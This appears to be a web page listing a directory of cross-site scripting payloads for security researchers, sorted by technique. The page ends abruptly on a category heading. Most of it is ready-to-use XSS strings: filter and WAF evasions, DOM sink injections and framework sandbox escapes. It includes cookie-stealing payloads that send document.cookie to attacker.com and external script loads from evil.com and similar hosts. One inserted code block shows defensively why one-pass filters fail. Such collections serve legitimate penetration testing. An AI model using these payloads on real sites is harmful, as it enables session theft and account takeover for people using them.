FindXSS
Your definitive XSS payload directory, featuring 281 verified payloads for ethical hackers and security researchers.
All Payloads
281 Payloads
Basic Alerts
Basic script injection
<script>alert('XSS')</script>
beginner
Basic Alerts
Case-insensitive script tags
<SCRIPT>alert('XSS');</SCRIPT>
beginner
Basic Alerts
Image onerror event
<img src=x onerror=alert('XSS')>
beginner
event handlers
Basic Alerts
SVG onload event
<svg onload=alert('XSS')>
beginner
event handlers
Basic Alerts
Body onload event (less common in snippets)
<body onload=alert('XSS')>
event handlers
intermediate
Basic Alerts
iframe with javascript: URL
<iframe src="javascript:alert('XSS')"></iframe>
beginner
bypass filter
intermediate
Basic Alerts
Anchor tag with javascript: URL
<a href="javascript:alert('XSS')">Click Me</a>
beginner
Basic Alerts
Direct javascript: URI (URL context)
javascript:alert('XSS')
beginner
Cookie Stealing (Demo)
Alerting current document cookies
<script>alert(document.cookie)</script>
beginner
intermediate
Cookie Stealing (Demo)
Sending cookies to an attacker's server (DEMO ONLY; cookies flagged HttpOnly never appear in document.cookie)
<script>new Image().src='http://attacker.com/steal?cookie='+document.cookie;</script>
intermediate
Cookie Stealing (Demo)
Image onerror sending cookies (DEMO ONLY)
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">
event handlers
intermediate
HTML Context (No Script Tag)
Image onerror event
<img src=x onerror=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
SVG onload event
<svg onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Body onload event
<body onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
iframe srcdoc attribute
<iframe srcdoc="<script>alert(1)</script>"></iframe>
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
Meta refresh tag
<meta http-equiv="refresh" content="0; url=javascript:alert(1)">
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
CSS @import of a javascript: URL (legacy IE only; current engines never execute script from a CSS URL)
<style>@import 'javascript:alert(1)';</style>
bypass filter
advanced
HTML Context (No Script Tag)
CSS expression (IE only, deprecated)
<div style="width:expression(alert('XSS'))">
bypass filter
advanced
HTML Context (No Script Tag)
Object tag with javascript: URI (legacy browsers only; current browsers do not execute it)
<object data="javascript:alert(1)"></object>
bypass filter
intermediate
HTML Context (No Script Tag)
Embed tag with javascript: URI (legacy browsers only; current browsers do not execute it)
<embed src="javascript:alert(1)"></embed>
bypass filter
intermediate
HTML Context (No Script Tag)
Video source onerror
<video><source onerror="javascript:alert(1)">
bypass filter
event handlers
intermediate
Event Handlers
Mouseover event attribute
onmouseover=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Click event attribute
onclick=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Error event attribute (often on img, video, etc.)
onerror=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Autofocus with onfocus event
autofocus onfocus=alert(1)
event handlers
bypass filter
intermediate
Event Handlers
Input event on input field
<input oninput=alert(1)>
event handlers
intermediate
Event Handlers
Details toggle event
<details open ontoggle=alert(1)>
event handlers
advanced
intermediate
WAF Evasions
Nested script tags (bypasses a filter that strips <script> in a single pass)
<scr<script>ipt>alert(1)</scr<script>ipt>
waf evasion
bypass filter
intermediate
WAF Evasions
String.fromCharCode evasion
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
SVG with self-closing slash
<svg/onload=alert(1)>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Null byte injection (legacy IE only; current HTML parsers do not drop the byte, so this depends on an intermediate decoder)
<scri%00pt>alert(1)</scri%00pt>
waf evasion
bypass filter
advanced
WAF Evasions
Recursive-filter bypass: a filter that removes the string 'script' once leaves a valid javascript: URI behind
javascrscriptipt:alert(1)
waf evasion
bypass filter
intermediate
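The nested-tag and mixed-case entries above only work because the filter they target runs once. The following is an added example, not part of the FindXSS directory, showing that bypass against a hypothetical one-pass blocklist, the fixed-point variant that closes it, and the encoding fix that makes the blocklist unnecessary for an element-content sink. The regex, function names and inputs are this example's own assumptions.

```javascript
// Added example, not part of the FindXSS directory: why the nested-tag and
// mixed-case entries above beat a one-pass blocklist, and what the minimum
// fix looks like. Names and the regex are this example's own assumptions.

// Hypothetical WAF rule: match <script ...> and </script ...> once, any case.
const SCRIPT_TAG = /<\s*\/?\s*script\b[^>]*>/gi;

// Naive filter: a single replace pass, which is what many blocklists do.
function stripOnce(input) {
  return input.replace(SCRIPT_TAG, '');
}

// Repeat until nothing changes. The round cap keeps hostile input from
// turning the filter into a CPU sink.
function stripToFixedPoint(input, maxRounds = 10) {
  let prev;
  let cur = input;
  for (let i = 0; i < maxRounds && cur !== prev; i++) {
    prev = cur;
    cur = stripOnce(cur);
  }
  return cur;
}

// The actual fix for an HTML element-content sink: encode, do not strip.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(s) {
  return s.replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}

// Does the output still contain something the HTML tokenizer sees as a tag?
function containsTag(s) {
  return /<[a-z]/i.test(s);
}

// Constructed inputs, copied from the directory entries above.
const NESTED = '<scr<script>ipt>alert(1)</scr<script>ipt>';
const SELF_CLOSING_SVG = '<svg/onload=alert(1)>';

function demo() {
  return {
    nestedAfterOnePass: stripOnce(NESTED),            // '<script>alert(1)</script>', a live tag
    nestedAfterFixedPoint: stripToFixedPoint(NESTED), // 'alert(1)', inert text
    svgUntouched: stripOnce(SELF_CLOSING_SVG),        // unchanged: the blocklist never matched
    svgEncoded: encodeHtml(SELF_CLOSING_SVG),         // '&lt;svg/onload=alert(1)&gt;'
  };
}
```

The point of the last two fields: even the fixed-point strip is only as good as its pattern list, and the `<svg/onload>` entry from this section is not on it. Encoding for the output context neutralises every tag, known or not.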
Real-World Attacks
Samy Worm (MySpace), simplified: CSS background URL carrying a javascript: URI. Illustrative only; this IE-era vector no longer executes, and the real worm split the scheme across a newline to beat MySpace's filter and was far more complex.
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
advanced
Real-World Attacks
GitHub Meta Tag Exploit (Conceptual). Actual exploit involved specific meta tag parsing.
<meta property="al:ios:app_name" content=''><script>alert("GitHub Meta Tag Exploit Example")</script>
advanced
Real-World Attacks
Conceptual Magecart: external skimmer script injection. Shows the type of vector, not a working payload; blocked by a strict script-src CSP.
<script src='//badsite.com/skim.js'></script>
advanced
DOM-Based XSS
Location hash used by script with innerHTML. Example: ...innerHTML = location.hash.substring(1);
#<img src=x onerror=alert(1)>
dom
beginner
intermediate
DOM-Based XSS
Query parameter used by script with document.write. Example: document.write(new URLSearchParams(window.location.search).get('search'))
search=<script>alert(1)</script>
dom
intermediate
DOM-Based XSS
Using eval with location.hash. Requires user to set hash.
eval(location.hash.slice(1)) // then set URL to #alert(1)
dom
advanced
DOM-Based XSS
String argument to setTimeout from URL parameter.
setTimeout('alert(1)', 0) // if setTimeout sink takes string from URL
dom
advanced
Mutation XSS (mXSS)
Malformed SVG mutating to trigger XSS
<svg><p><style><img src="x" onerror="alert(1)">
mutation
advanced
Mutation XSS (mXSS)
Noscript tag mutation
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
mutation
advanced
Mutation XSS (mXSS)
Comment mutation
<!--><img src=x onerror=alert(1)>-->
mutation
advanced
Framework-Specific
React dangerouslySetInnerHTML. To be used as props e.g. <div dangerouslySetInnerHTML={{"__html": "<img src=x onerror=alert(1)>"}} />
{"__html": "<img src=x onerror=alert(1)>"}
framework
advanced
Framework-Specific
AngularJS sandbox escape (works where there is no expression sandbox: 1.0 to 1.1.5 and 1.6+; sandboxed 1.2 to 1.5.x builds need version-specific escapes)
{{constructor.constructor('alert(1)')()}}
framework
advanced
Framework-Specific
AngularJS event handler injection (autofocus so ng-focus fires without interaction; relies on $event.path, which Chromium removed in version 109, newer builds use $event.composedPath())
<input autofocus ng-focus=$event.path|orderBy:'(z=alert)(1)'>
framework
advanced
event handlers
Framework-Specific
Vue.js v-html directive
<div v-html="'<img src=x onerror=alert(1)>'"></div>
framework
advanced
Framework-Specific
Vue 2 client-side template injection: user input rendered into a Vue template (this is not reachable from a template expression; constructor is)
{{constructor.constructor('alert(1)')()}}
framework
advanced
Polyglot Payloads
Works in HTML attribute, then breaks out to create img tag
"><img src=x onerror=alert(1)>
polyglot
bypass filter
intermediate
Polyglot Payloads
Complex polyglot for multiple contexts
javascript:alert(1)//--></title></style></textarea></script></xmp>
polyglot
advanced
Polyglot Payloads
JS string, HTML attribute, and JS comment termination
'-alert(1)//
polyglot
intermediate
Polyglot Payloads
JS block comment, attribute, JS comment termination
*/alert(1)//
polyglot
intermediate
Polyglot Payloads
HTML attribute breakout to SVG
"><svg onload=alert(1)>
polyglot
bypass filter
event handlers
intermediate
iFrame Based
iframe with javascript: URL
<iframe src="javascript:alert('XSS')"></iframe>
beginner
bypass filter
intermediate
iFrame Based
iframe srcdoc with HTML-entity encoded script (entities are decoded inside the attribute value before srcdoc is parsed)
<iframe srcdoc="&lt;script&gt;alert('XSS')&lt;/script&gt;"></iframe>
bypass filter
advanced
intermediate
iFrame Based
iframe with data URI (runs in an opaque origin: the alert fires, but the script cannot read the embedding page's cookies or DOM)
<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>
bypass filter
advanced
intermediate
iFrame Based
iframe onload event (the handler runs in the embedding page, whatever the frame contains)
<iframe onload="alert('XSS')"></iframe>
event handlers
intermediate
Obfuscated/Encoded
Base64 encoded payload with eval
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
advanced
bypass filter
Obfuscated/Encoded
URL encoded payload with eval in onerror
<img src=x onerror="eval(unescape('%61%6c%65%72%74%28%27%58%53%53%27%29'))">
advanced
bypass filter
event handlers
Obfuscated/Encoded
Base64 encoded HTML in data URI (Chromium and Firefox block top-level navigation to data: URLs, so the link is inert there; the same URI still runs inside an iframe src, in an opaque origin)
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click Me</a>
advanced
bypass filter
Obfuscated/Encoded
Using template literals for alert
<scRipt>alert`1`</scRipt>
bypass filter
intermediate
Basic Alerts
Details tag with ontoggle event
<details/open/ontoggle=alert`1`>
event handlers
bypass filter
intermediate
Basic Alerts
Bold tag with onmouseover
<b onmouseover=alert(1)>hover</b>
event handlers
intermediate
Basic Alerts
Marquee tag onstart event (browser-dependent; not all engines fire marquee events)
<marquee onstart=alert(1)>
event handlers
advanced
Basic Alerts
Video tag onerror
<video src=1 onerror=alert(1)></video>
event handlers
intermediate
Basic Alerts
Audio tag onerror
<audio src=1 onerror=alert(1)></audio>
event handlers
intermediate
HTML Context (No Script Tag)
Form action javascript URI
<form action="javascript:alert(1)"><input type=submit></form>
bypass filter
intermediate
HTML Context (No Script Tag)
isindex tag (obsolete; current parsers treat it as an unknown element, so nothing is loaded and onerror never fires)
<isindex type=image src=1 onerror=alert(1)>
bypass filter
event handlers
advanced
HTML Context (No Script Tag)
Body background attribute with javascript: URI (legacy IE only)
<body background="javascript:alert(1)">
bypass filter
intermediate
WAF Evasions
Mixed case tags
<sCrIpt>alert(1)</sCriPt>
waf evasion
bypass filter
intermediate
WAF Evasions
Single quotes for attribute
<img src=x onerror='alert(1)'>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Backticks as attribute quotes (legacy IE only; other browsers pass the backticks into the handler, where they form an inert template literal)
<img src=x onerror=`alert(1)`>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Tabs and newlines in tag
<img src=x
onerror=alert(1)>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Double starting angle bracket
<<script>alert(1)//<</script>
waf evasion
bypass filter
advanced
DOM-Based XSS
Query param 'name' written to DOM. Ex: element.innerHTML = 'Welcome ' + params.get('name');
name=<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
DOM XSS via eval and location.hash with polyglot characteristics
javascript:/*--></title></style></textarea></script>*/eval(location.hash.slice(1))//
dom
advanced
polyglot
DOM-Based XSS
DOM XSS via document.write and controllable pathname (browsers percent-encode < and > in the path, so the sink has to decode first)
document.write(decodeURIComponent(location.pathname)) // if path is /<img src=x onerror=alert(1)>
dom
advanced
Mutation XSS (mXSS)
SVG animate setting an anchor's href to a javascript: URI (needs the anchor it targets and fires on click; not a parser mutation)
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a></svg>
mutation
advanced
Mutation XSS (mXSS)
MathML link via xlink:href (legacy Firefox; fires on click, not a parser mutation)
<math><mi xlink:href=javascript:alert(1)>click</mi>
mutation
advanced
Framework-Specific
AngularJS ng-csp bypass (only where the expression sandbox is absent; sandboxed 1.2 to 1.5.x builds reject the constructor access)
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
framework
advanced
Framework-Specific
React dangerouslySetInnerHTML in props
props.dangerouslySetInnerHTML={{ __html: '<img src=x onerror=alert(1)>' }}
framework
advanced
Framework-Specific
Vue.js event handler injection
<div v-on:click="constructor.constructor('alert(1)')()">Click</div>
framework
advanced
event handlers
Basic Alerts
External script reference (simplified, assuming xss.rocks/xss.js contains alert(1))
<sCriPt sRc=//xss.rocks/xss.js></ScRiPt>
beginner
intermediate
Basic Alerts
Confirm box via img onerror
<iMg sRc=x OnErRoR=confirm(1)>
beginner
event handlers
intermediate
Basic Alerts
Prompt box via video onerror
<vIdEo sRc=x OnErRoR=prompt(1)></vIdEo>
beginner
event handlers
intermediate
Basic Alerts
Print dialog via audio onerror
<aUdio sRc=x OnErRoR=print()></aUdio>
beginner
event handlers
intermediate
Basic Alerts
Delayed alert using setTimeout
<scrIpt>setTimeout('alert(1)',10)</scrIpt>
beginner
intermediate
Basic Alerts
Repeating alert using setInterval (beware of annoyance)
<scrIpt>setInterval('alert(1)',5000)</scrIpt>
beginner
intermediate
Basic Alerts
Case variation for javascript URI in iframe
<iFrAmE sRc=JaVaScRiPt:alert(1)>
beginner
bypass filter
intermediate
Basic Alerts
javascript URI in img src (less common to execute)
<iMg sRc=javascript:alert(1)>
beginner
intermediate
Basic Alerts
Script tag within SVG
<sVg><sCriPt>alert(1)</sCriPt></sVg>
beginner
intermediate
Basic Alerts
Body onload with case variation
<bOdY oNlOaD=alert(1)>
event handlers
intermediate
Basic Alerts
Div onmouseover event
<dIv oNmOuSeOvEr=alert(1)>HOVER ME</dIv>
event handlers
intermediate
Basic Alerts
Textarea autofocus onfocus
<TeXtArEa AuToFoCuS oNfOcUs=alert(1)>
event handlers
intermediate
Basic Alerts
Input autofocus onfocus
<iNpUt TyPe=TeXt AuToFoCuS oNfOcUs=alert(1)>
event handlers
intermediate
Basic Alerts
Alerting current domain
<sCrIpT>alert(document.domain)</sCrIpT>
beginner
intermediate
Basic Alerts
HTML entity for the colon in a javascript: URI (decoded inside the attribute value before the URL is parsed)
<a hReF="jAvAsCrIpT&#58;alert(1)">Click</a>
beginner
bypass filter
intermediate
Event Handlers
Drag event
ondrag=alert(1)
event handlers
intermediate
Event Handlers
Scroll event
onscroll=alert(1)
event handlers
intermediate
Event Handlers
Copy event
oncopy=alert(1)
event handlers
intermediate
Event Handlers
Cut event
oncut=alert(1)
event handlers
intermediate
Event Handlers
Paste event
onpaste=alert(1)
event handlers
intermediate
Event Handlers
Blur event on input
<input onblur=alert(1)>
event handlers
intermediate
Event Handlers
Change event on select
<select onchange=alert(1)><option>1</option></select>
event handlers
intermediate
Event Handlers
Keydown event
<input onkeydown=alert(1)>
event handlers
intermediate
Event Handlers
Keyup event
<input onkeyup=alert(1)>
event handlers
intermediate
Event Handlers
Keypress event
<input onkeypress=alert(1)>
event handlers
intermediate
Event Handlers
Mousedown event
<button onmousedown=alert(1)>Click</button>
event handlers
intermediate
Event Handlers
Mouseup event
<button onmouseup=alert(1)>Click</button>
event handlers
intermediate
Event Handlers
Mousemove event
<div onmousemove=alert(1)>Move here</div>
event handlers
intermediate
Event Handlers
Mouseout event
<div onmouseout=alert(1)>Move out</div>
event handlers
intermediate
Event Handlers
Mouseenter event
<div onmouseenter=alert(1)>Enter</div>
event handlers
intermediate
Event Handlers
Mouseleave event
<div onmouseleave=alert(1)>Leave</div>
event handlers
intermediate
Event Handlers
Submit event on form
<form onsubmit=alert(1)><input type=submit></form>
event handlers
intermediate
Event Handlers
Reset event on form
<form onreset=alert(1)><input type=reset></form>
event handlers
intermediate
Event Handlers
Iframe onloadstart event (loadstart is a media and XHR progress event; iframes do not fire it, so this entry is listed for completeness only)
<iframe onloadstart=alert(1)></iframe>
event handlers
advanced
intermediate
Event Handlers
Video onplay event
<video onplay=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Video onpause event
<video onpause=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Video onended event
<video onended=alert(1) src=http://example.com/vid.mp4></video>
event handlers
intermediate
Event Handlers
Audio onloadeddata event
<audio onloadeddata=alert(1) src=http://example.com/aud.mp3></audio>
event handlers
intermediate
Event Handlers
Checkbox onchange event
<input type=checkbox onchange=alert(1)>
event handlers
intermediate
Event Handlers
Touchstart event (mobile)
ontouchstart=alert(1)
event handlers
intermediate
HTML Context (No Script Tag)
bgsound tag (IE only)
<bgsound src="javascript:alert(1)">
bypass filter
advanced
HTML Context (No Script Tag)
CSS background-image with javascript URI (legacy IE only)
<div style="background-image: url(javascript:alert(1))">
bypass filter
advanced
HTML Context (No Script Tag)
CSS list-style-image with javascript URI (legacy IE only)
<div style="list-style-image: url(javascript:alert(1))">
bypass filter
advanced
HTML Context (No Script Tag)
Link tag with data URI CSS import of a javascript: URL (legacy IE only)
<link rel="stylesheet" href="data:text/css,@import 'javascript:alert(1)';">
bypass filter
advanced
HTML Context (No Script Tag)
Embedded style for list-style-image with javascript URI (legacy IE only)
<style>li {list-style-image: url("javascript:alert(1)")}</style><ul><li>
bypass filter
advanced
HTML Context (No Script Tag)
Object with scriptlet type (IE)
<object type="text/x-scriptlet" data="http://example.com/xss.html"></object>
bypass filter
advanced
HTML Context (No Script Tag)
Meta tag to set cookie (not XSS, but a related injection vector; http-equiv="Set-Cookie" is ignored by current browsers)
<meta http-equiv="Set-Cookie" content="cookievalue; path=/; domain=attacker.com; HttpOnly">
advanced
HTML Context (No Script Tag)
Base tag with javascript URI (affects relative URLs; legacy, since current URL parsers refuse to resolve a relative path against a javascript: base)
<base href="javascript:alert(1)//">
bypass filter
advanced
HTML Context (No Script Tag)
Applet tag (requires Java, very old)
<applet code="java.applet.Applet" archive="exploit.jar"></applet>
advanced
HTML Context (No Script Tag)
HTML Imports (removed from Chromium in version 80; no current browser supports them)
<link rel=import href="data:text/html,<script>alert(1)</script>">
bypass filter
advanced
HTML Context (No Script Tag)
Frameset onload event (only parsed when it appears before any body content; the parser drops a frameset that arrives later)
<frameset onload=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Table background attribute with javascript URI (legacy IE only)
<table background="javascript:alert(1)">
bypass filter
intermediate
HTML Context (No Script Tag)
Mozilla XBL binding (Firefox only; XBL has been removed)
<div style="-moz-binding:url('http://example.com/xss.xml#xss')">
advanced
HTML Context (No Script Tag)
HTC behavior (IE only)
<xss id=x style=behavior:url(#default#time2) onbegin=alert(1)>
advanced
HTML Context (No Script Tag)
XML data island with script (IE)
<xml id=x><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script></xml>
advanced
HTML Context (No Script Tag)
Button formaction attribute
<button formaction=javascript:alert(1)>Click</button>
bypass filter
intermediate
HTML Context (No Script Tag)
Input type image with onerror
<input type=image src=x onerror=alert(1)>
bypass filter
event handlers
intermediate
HTML Context (No Script Tag)
Font family with script (does not execute; a CSS string value is inert)
<div style="font-family:'<script>alert(1)</script>';">
advanced
HTML Context (No Script Tag)
Marquee onbounce event
<marquee onbounce=alert(1)>
event handlers
advanced
HTML Context (No Script Tag)
Marquee onfinish event
<marquee onfinish=alert(1)>
event handlers
advanced
HTML Context (No Script Tag)
Video poster attribute with javascript URI (current browsers do not execute javascript: in resource attributes)
<video poster=javascript:alert(1)//>
bypass filter
intermediate
HTML Context (No Script Tag)
Audio src with javascript URI (current browsers do not execute javascript: in resource attributes)
<audio src=javascript:alert(1)//>
bypass filter
intermediate
HTML Context (No Script Tag)
Malformed CSS import (legacy IE only)
<style>*[{}@import'javascript:alert(1)';/*]</style>
bypass filter
advanced
HTML Context (No Script Tag)
SVG link with javascript URI
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">Click</text></a></svg>
bypass filter
advanced
intermediate
HTML Context (No Script Tag)
MathML with href (Firefox; fires on click)
<math href="javascript:alert(1)">Click</math>
bypass filter
advanced
WAF Evasions
Hex encoded string with eval
<img src=x onerror="eval('\x61lert(1)')">
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Hex encoded function name access
<img src=x onerror="eval(window['\x61lert'](1))">
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Space after closing tag
<scriPt>alert(1)</scriPt >
waf evasion
bypass filter
intermediate
WAF Evasions
Hex-encoded space (%20) between tag name and attribute; only works where the input is URL-decoded before it reaches the HTML parser, which does not decode entities inside a tag
<script%20type="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Hex-encoded carriage return (%0D) between tag name and attribute; same decoding requirement as the space variant
<script%0Dtype="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Hex-encoded tab (%09) between tag name and attribute; same decoding requirement as the space variant
<script%09type="text/javascript">javascript:alert(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Spaces around equals sign in event handler
<img src=x onerror = alert(1)>
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Tab in javascript URI (browsers strip ASCII tab, CR and LF from a URL before reading the scheme)
jav	ascript:alert(1)
waf evasion
bypass filter
intermediate
WAF Evasions
Newline in javascript URI
java
script:alert(1)
waf evasion
bypass filter
intermediate
WAF Evasions
Hex HTML entities for javascript:alert(1) (usable inside an attribute value such as href, where entities are decoded before the URL is parsed)
&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
waf evasion
bypass filter
advanced
WAF Evasions
Decimal HTML entities for javascript:alert(1) (same attribute-value requirement as the hex form)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
waf evasion
bypass filter
advanced
WAF Evasions
Decimal HTML entities in img src (decodes to a javascript: URI, which current browsers do not execute for img; legacy entry)
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
waf evasion
bypass filter
advanced
WAF Evasions
Comments and newlines around alert
<script>/*
*/alert(1)/*
*/</script>
waf evasion
bypass filter
intermediate
WAF Evasions
String concatenation for function name
<script>var a = 'al'; var b = 'ert'; (this[a+b])(1);</script>
waf evasion
bypass filter
advanced
WAF Evasions
Tab char (encoded) in javascript URI
<IMG SRC="jav	ascript:alert('XSS');">
waf evasion
bypass filter
advanced
WAF Evasions
HTML-entity encoded parentheses in event handler (decoded in the attribute value before the handler is compiled)
<BODY ONLOAD=alert&#40;1&#41;>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Script source with unterminated tag
<SCRIPT SRC=//evil.com/a.js?<B>
waf evasion
bypass filter
advanced
WAF Evasions
Extra space before closing iframe tag
<IFRAME SRC="javascript:alert(1)" </IFRAME>
waf evasion
bypass filter
intermediate
WAF Evasions
The classic XSS locator polyglot from the OWASP XSS Filter Evasion Cheat Sheet, breaking out of JS strings and HTML attributes
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
waf evasion
bypass filter
advanced
polyglot
WAF Evasions
Backticks and spaces in attributes (legacy IE attribute parsing only)
<img src="x` `<script>alert(1)</script>"`` >
waf evasion
bypass filter
advanced
WAF Evasions
Function constructor called as a template tag: the strings array is coerced to the function body, and the second tag call invokes the result
<img src=x onerror=Function`alert( 1)```>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
setInterval called as a template tag in SVG (the strings array is coerced to the string 'alert( 1)' and evaluated)
<svg onload=setInterval`alert( 1)`>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Unicode escape inside a JS identifier (JS decodes \uXXXX in identifier names as well as in strings, so the word alert never appears literally)
<details/open/ontoggle=\u0061lert(1)>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
Comments inside script tags (not a tag to the HTML parser; only useful against a filter that strips HTML comments before the browser sees the input)
<scri<!--test-->pt>alert(1)</sc<!--test-->ript>
waf evasion
bypass filter
advanced
WAF Evasions
Protocol confusion in src
<img src="x:gif" onerror="alert(1)">
waf evasion
bypass filter
event handlers
intermediate
WAF Evasions
Non-breaking space (UTF-8) in script tag (not a valid tag for the HTML parser; only useful where an intermediate decoder strips the bytes)
<s%c2%a0cript>alert(1)</s%c2%a0cript>
waf evasion
bypass filter
advanced
WAF Evasions
CSS animation XSS
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
waf evasion
bypass filter
event handlers
advanced
WAF Evasions
JS property name built from fragments, then assigned a javascript: URI (this.location = 'javascript:alert(1)')
a="loca";b="tion";c="javascript:";d="alert(1)";this[a+b]=c+d;
waf evasion
bypass filter
advanced
WAF Evasions
Object tag with data URI (runs in an opaque origin and is often blocked by CSP object-src)
<object data="data:text/html,<script>alert(1)</script>"></object>
waf evasion
bypass filter
advanced
WAF Evasions
Embed tag with base64 data URI (runs in an opaque origin and is often blocked by CSP object-src)
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
waf evasion
bypass filter
advanced
DOM-Based XSS
Source 'value' to sink 'eval'. Ex: eval(params.get('value')) (the sink takes JavaScript, so markup would only raise a SyntaxError)
value=alert(1)&sink=eval
dom
advanced
DOM-Based XSS
Source 'iframe' to sink 'innerHTML'. Ex: div.innerHTML = params.get('iframe')
iframe=<iframe src=javascript:alert(1)></iframe>&sink=innerHTML
dom
advanced
DOM-Based XSS
Source 'url' to sink 'document.location'. Ex: document.location = params.get('url')
url=javascript:alert(1)&sink=location
dom
advanced
DOM-Based XSS
Source 'html' to sink 'document.write'. Ex: document.write(params.get('html'))
html=<svg onload=alert(1)>&sink=document.write
dom
intermediate
DOM-Based XSS
Source 'script' to sink 'Function'. Ex: new Function(params.get('script'))()
script=alert(1)&sink=Function
dom
advanced
DOM-Based XSS
Payload in URL fragment; the script takes document.URL after the '#' and writes it to a sink.
#<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
Payload in URL query; the script takes document.URL after the '?' and writes it to a sink.
?payload=<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
Using window.name as source. Example: div.innerHTML = window.name;
window.name="<img src=x onerror=alert(1)>"; // then script uses window.name in a sink
dom
advanced
DOM-Based XSS
Using localStorage as source. Example: div.innerHTML = localStorage.getItem('xss');
localStorage.setItem('xss', '<img src=x onerror=alert(1)>'); // then script uses localStorage.getItem('xss') in sink
dom
advanced
DOM-Based XSS
Using sessionStorage as source. Example: div.innerHTML = sessionStorage.getItem('xss');
sessionStorage.setItem('xss', '<img src=x onerror=alert(1)>'); // then script uses sessionStorage.getItem('xss') in sink
dom
advanced
DOM-Based XSS
Using document.cookie as source. Example: div.innerHTML = document.cookie;
document.cookie="xss=<img src=x onerror=alert(1)>"; // then script uses document.cookie in sink
dom
intermediate
DOM-Based XSS
jQuery .html() sink with location.hash source
jQuery('#El').html(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
AngularJS jqLite .html() sink with location.hash source (jqLite takes an element, not a selector)
angular.element(document.getElementById('El')).html(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
jQuery .append() sink
$('#El').append(location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
framework
intermediate
DOM-Based XSS
outerHTML sink
document.getElementById('El').outerHTML = location.hash.substring(1) // URL: page.html#<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
document.evaluate with an attacker-controlled XPath (XPath injection against the DOM, not script execution; listed as a related DOM sink)
document.evaluate(location.hash.substring(1), document, null, 0, null) // URL: page.html#//someXPathThatInjectsHTML
dom
advanced
DOM-Based XSS
createContextualFragment sink
Range.prototype.createContextualFragment.call(document.createRange(), location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
advanced
DOM-Based XSS
insertAdjacentHTML sink
document.body.insertAdjacentHTML('afterbegin', location.hash.substring(1)) // URL: page.html#<img src=x onerror=alert(1)>
dom
intermediate
DOM-Based XSS
JSON.parse of user input feeding an HTML sink (JSON.parse itself is safe; the .xss value has to reach innerHTML or a similar sink)
JSON.parse(location.hash.substring(1)).xss // URL: page.html#{"xss":"<img src=x onerror=alert(1)>"}
dom
advanced
DOM-Based XSS
postMessage DOM XSS. Ex: e.data.callback + '(' + e.data.msg + ')' then eval'd or innerHTML'd.
msg=<svg onload=alert(1)>&callback=handleMessage // if postMessage handler uses data in innerHTML
dom
advanced
DOM-Based XSS
document.referrer source
referrer=<img src=x onerror=alert(1)> // if script uses document.referrer in a sink
dom
intermediate
DOM-Based XSS
